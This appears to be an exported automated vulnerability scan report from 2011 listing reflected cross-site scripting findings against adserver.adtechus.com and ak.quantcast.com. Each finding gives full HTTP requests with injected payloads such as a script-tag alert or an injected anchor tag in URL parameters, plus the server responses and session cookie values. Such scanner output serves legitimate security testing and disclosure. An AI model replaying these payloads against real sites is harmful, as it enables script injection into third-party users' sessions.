GET /adiframef37f6"><script>alert(1)</script>43f9462365/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://drudgereport.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.3.0.4D572FB5.15FB07.A75CE1.1473.1
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 293
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89cf1"><script>alert(1)</script>6f6a1cff5c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.089cf1"><script>alert(1)</script>6f6a1cff5c/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://drudgereport.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.3.0.4D572FB5.15FB07.A75CE1.1473.1
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 293
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28ec2"><script>alert(1)</script>c0a20453787 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/523528ec2"><script>alert(1)</script>c0a20453787/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://drudgereport.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.3.0.4D572FB5.15FB07.A75CE1.1473.1
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 294
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4743"><script>alert(1)</script>6e260f872e4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5235/1131606c4743"><script>alert(1)</script>6e260f872e4/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://drudgereport.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.3.0.4D572FB5.15FB07.A75CE1.1473.1
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 294
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 887be"><script>alert(1)</script>d3fdf2880b5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5235/1131606/0887be"><script>alert(1)</script>d3fdf2880b5/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://drudgereport.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.3.0.4D572FB5.15FB07.A75CE1.1473.1
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 294
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 879ef"><script>alert(1)</script>d3642495e1a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5235/1131606/0/154879ef"><script>alert(1)</script>d3642495e1a/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://drudgereport.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.3.0.4D572FB5.15FB07.A75CE1.1473.1
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 294
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d715b"><script>alert(1)</script>cb98fdd4e27 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5235/1131606/0/154/ADTECHd715b"><script>alert(1)</script>cb98fdd4e27;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://drudgereport.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.3.0.4D572FB5.15FB07.A75CE1.1473.1
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 294
The value of the cookie request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34d59"><script>alert(1)</script>eccfe2120c7 was submitted in the cookie parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=00000134d59"><script>alert(1)</script>eccfe2120c7 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://drudgereport.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.3.0.4D572FB5.15FB07.A75CE1.1473.1
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 294
2.43. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://adserver.adtechus.com
Path:
/adiframe/3.0/5235/1131606/0/154/ADTECH
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9c02"><script>alert(1)</script>017374d66f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001&d9c02"><script>alert(1)</script>017374d66f8=1 HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://drudgereport.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.3.0.4D572FB5.15FB07.A75CE1.1473.1
Response
HTTP/1.0 200 OK Connection: close Content-Type: text/html Content-Length: 297
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dca6"><a>3b74bcc7161 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /css1dca6"><a>3b74bcc7161/ie6.css HTTP/1.1 Host: ak.quantcast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=14861494.2106100296.1296313950.1297527348.1297539959.9; __qca=P0-1340562691-1296313949532; qcVisitor=2|97|1297445121784|21|NOTSET;
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en Date: Sun, 13 Feb 2011 01:36:32 GMT Content-Length: 7762 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 95845<a>160ebdce2c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /css95845<a>160ebdce2c/ie6.css HTTP/1.1 Host: ak.quantcast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=14861494.2106100296.1296313950.1297527348.1297539959.9; __qca=P0-1340562691-1296313949532; qcVisitor=2|97|1297445121784|21|NOTSET;
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en Date: Sun, 13 Feb 2011 01:36:33 GMT Content-Length: 7753 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; cha ...[SNIP]... <em> css95845<a>160ebdce2c ie6.css</em> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b184a"><a>e278f378478 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /css/ie6.cssb184a"><a>e278f378478 HTTP/1.1 Host: ak.quantcast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=14861494.2106100296.1296313950.1297527348.1297539959.9; __qca=P0-1340562691-1296313949532; qcVisitor=2|97|1297445121784|21|NOTSET;
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en Date: Sun, 13 Feb 2011 01:36:35 GMT Content-Length: 17486 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3d6e7<a>91e331edfde was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /css3d6e7<a>91e331edfde/ie7.css HTTP/1.1 Host: ak.quantcast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=14861494.2106100296.1296313950.1297527348.1297539959.9; __qca=P0-1340562691-1296313949532; qcVisitor=2|97|1297445121784|21|NOTSET;
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en Date: Sun, 13 Feb 2011 01:36:33 GMT Content-Length: 7756 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; cha ...[SNIP]... <em> css3d6e7<a>91e331edfde ie7.css</em> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93c8f"><a>a95366bad4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /css93c8f"><a>a95366bad4/ie7.css HTTP/1.1 Host: ak.quantcast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=14861494.2106100296.1296313950.1297527348.1297539959.9; __qca=P0-1340562691-1296313949532; qcVisitor=2|97|1297445121784|21|NOTSET;
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en Date: Sun, 13 Feb 2011 01:36:32 GMT Content-Length: 7759 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a365"><a>5d4b90c6e67 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /css/ie7.css4a365"><a>5d4b90c6e67 HTTP/1.1 Host: ak.quantcast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=14861494.2106100296.1296313950.1297527348.1297539959.9; __qca=P0-1340562691-1296313949532; qcVisitor=2|97|1297445121784|21|NOTSET;
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en Date: Sun, 13 Feb 2011 01:36:35 GMT Content-Length: 17482 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 484cc<a>c4af98fcd6c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /dynamic-css484cc<a>c4af98fcd6c/screen-optimized.css?v=2011021312 HTTP/1.1 Host: ak.quantcast.com Proxy-Connection: keep-alive Referer: http://www.quantcast.com/top-sites-1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=27727020.780724242.1297445179.1297458290.1297473023.4; qcVisitor=2|97|1297445121784|21|NOTSET; __utma=14861494.2106100296.1296313950.1297527348.1297539959.9
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Vary: Accept-Encoding Date: Sun, 13 Feb 2011 01:11:05 GMT Connection: close Content-Length: 7819
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; cha ...[SNIP]... <em> dynamic-css484cc<a>c4af98fcd6c screen-optimized.css</em> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ceeb2"><a>22d4f861d9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /dynamic-cssceeb2"><a>22d4f861d9/screen-optimized.css?v=2011021312 HTTP/1.1 Host: ak.quantcast.com Proxy-Connection: keep-alive Referer: http://www.quantcast.com/top-sites-1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=27727020.780724242.1297445179.1297458290.1297473023.4; qcVisitor=2|97|1297445121784|21|NOTSET; __utma=14861494.2106100296.1296313950.1297527348.1297539959.9
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Vary: Accept-Encoding Date: Sun, 13 Feb 2011 01:11:00 GMT Connection: close Content-Length: 7822
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41b4d"><a>6756d908ee5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /dynamic-css/screen-optimized.css41b4d"><a>6756d908ee5?v=2011021312 HTTP/1.1 Host: ak.quantcast.com Proxy-Connection: keep-alive Referer: http://www.quantcast.com/top-sites-1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=27727020.780724242.1297445179.1297458290.1297473023.4; qcVisitor=2|97|1297445121784|21|NOTSET; __utma=14861494.2106100296.1296313950.1297527348.1297539959.9
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Vary: Accept-Encoding Date: Sun, 13 Feb 2011 01:11:09 GMT Connection: close Content-Length: 7825
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 147b1<a>d42ee9bbe47 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /dynamic-css/screen-optimized.css147b1<a>d42ee9bbe47?v=2011021312 HTTP/1.1 Host: ak.quantcast.com Proxy-Connection: keep-alive Referer: http://www.quantcast.com/top-sites-1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=27727020.780724242.1297445179.1297458290.1297473023.4; qcVisitor=2|97|1297445121784|21|NOTSET; __utma=14861494.2106100296.1296313950.1297527348.1297539959.9
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Vary: Accept-Encoding Date: Sun, 13 Feb 2011 01:11:17 GMT Connection: close Content-Length: 7819
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; cha ...[SNIP]... <em> dynamic-css screen-optimized.css147b1<a>d42ee9bbe47</em> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f09e"><a>5559fddef87 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /js3f09e"><a>5559fddef87/concat.js?v=2011021312 HTTP/1.1 Host: ak.quantcast.com Proxy-Connection: keep-alive Referer: http://www.quantcast.com/top-sites-1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=27727020.780724242.1297445179.1297458290.1297473023.4; qcVisitor=2|97|1297445121784|21|NOTSET; __utma=14861494.2106100296.1296313950.1297527348.1297539959.9
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Vary: Accept-Encoding Date: Sun, 13 Feb 2011 01:11:01 GMT Connection: close Content-Length: 7765
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1cf42<a>c1a0ed6d243 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
